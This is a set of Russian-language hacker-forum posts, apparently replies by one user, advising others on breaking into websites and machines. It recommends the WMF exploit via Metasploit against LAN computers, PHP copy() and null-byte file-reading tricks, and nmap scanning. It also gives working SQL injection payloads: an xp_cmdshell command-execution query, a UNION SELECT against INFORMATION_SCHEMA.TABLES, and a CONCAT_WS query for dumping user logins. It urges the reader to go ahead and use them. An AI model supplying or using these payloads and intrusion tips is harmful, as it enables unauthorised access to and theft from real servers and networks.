Что такое MITM и RDP народ, включая меня, по-видимому не знает и ноябрьского хакера  у меня нет...Может расскажешь вкратце о чем речь в твоей статье...

Да, ты прав, все уже давно патчено, однако практика доказывает обратное...

Однажды юзал FC4... О, эта ОС хуже винглюка, поверьте мне, братцы! Насчет Fedora Core 5 не знаю, так как не пробывал, но слышал, что она не лучше четвертой версии...

2 pop_korn
Как раз в моем случае на серваке крутится MySQL версии 5. Скажи, плиз, в какой таблице хранятся  имена всех полей и таблиц!

Действительно, в phpBB, насколько я помню соль не используется. А вот в IPB используется...

2 Skvoznoy
Тогда мона попробывать багу в copy(), с помощью которой можно просматривать файлы юзеров. Но это пройдет только в случае старой версии PHP.

Сплоинт...хех...это слово мне больше напоминает слонов, чем эксплоиты =)

На комп в локалке можно залезть, заюзав эксплоит эксплуатирующий багу при обработке WMF-изображений. Баг довольно старый, но безотказный (работает даже на Висте, не говоря уже о XP SP2=) Metasploit Framework тебе в помощь, друг.

2 De%00
Ты хочешь чтобы тебе нашли уязвимость в последней версии PHPBB?
Тогда я тоже хочу! Люди, найдите уязвимость в PHPBB  2.0.21!

ууу Америку открыл!
Про то, что нулл байт очень удобная вещь знает даже моя бабушка

можно попробывать посмотреть файлы на сервере. Если есть паблик скрипты, можно узнать данные для подключения к базе...

Во-во Goudini правильно пишет...
%00 в данном случае -так называемый NULL BYTE. Он отрезает остальную часть строки.
Правда magic_quotes_gpc слэширует все эти нулл байты, в этом и вся проблема оказывается во многих случаях...

да... если Лебедевым сделано то это серьезно... Забей на этот сайт, чувак

FreeBSD 6.1...
мдя...рута тут точно не получить если пароля не знаешь....

Попробуй nmap'ом посканировать...

Ты поподробней опиши как тестил...

Закрыт? У меня все работает... Вот точная ссылка статьи. Если не сможешь открыть ссылочку тогда я могу отправить эту статейку тебе на мыло

Забей на эти DATABASE(), USER(), VERSION()! В msSQL все гораздо круче - можно например приконектится через базу к твоему компу и не только! Вот кратко основные функции, полезные хацкеру:

xp_regaddmultistring (добавляем строковый параметр)
xp_regdeletekey (удаляем ключ)
xp_regdeletevalue (удаляем значение ключа)
xp_regread (читаем ключ)
xp_regremovemultistring (удаляем строковый параметр)
xp_regwrite (пишем информацию в реестр)

Вот конкретный пример:

exec master..xp_cmdshell 'dir'

С помощью этого запроса можно выполнять любые команды на серваке =)
Вот еще интересная инфа: системная таблица INFORMATION_SCHEMA.TABLES содержит информацию всех таблиц на сервере.
Вот пример:

http://zadov/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Ясно? А теперь действуй! =)

Недавно нашел в статье 1dt.w0lf'а как можно это сделать:
CONCAT_WS("|",(select login from users LIMIT 0,1),(select login from users LIMIT 1,1),(select login from users LIMIT 2,1))
Первый параметр это разделитель, а остальное и так ясно...